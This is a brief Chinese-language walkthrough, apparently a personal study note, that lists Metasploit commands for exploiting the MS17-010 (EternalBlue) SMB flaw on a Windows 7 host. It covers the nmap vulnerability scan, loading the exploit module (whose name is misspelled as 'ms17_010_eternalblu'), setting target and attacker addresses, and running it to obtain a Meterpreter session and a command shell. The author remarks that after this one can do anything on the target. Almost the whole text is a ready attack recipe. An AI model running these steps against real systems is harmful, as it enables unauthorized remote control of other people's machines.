步骤:
漏洞扫描,通过nmap脚本检测目标是否存在MS17-010漏洞
1 nmap –script smb-vuln*【目标主机】
启动Metasploit框架
2 msfconsole
搜索并加载漏洞利用模块
3 search ms17-010 #搜索模块
4 use exploit/windows/smb/ms17_010_eternalblu #选择永恒之蓝利⽤模块(输⼊对应序号也可:use 0)
配置攻击参数
5 show options #查看配置参数
6 set rhosts 【目标机ip】
7 set lhost 【攻击机ip】
执行攻击
8 run #或者 exploit 执行攻击




攻击成功后,将获得⽬标机的 Meterpreter交互式会话
shell获取目标机CMD命令行

然后就可以在win7里为所欲为了,实力不够我还不知道怎么为所欲为….



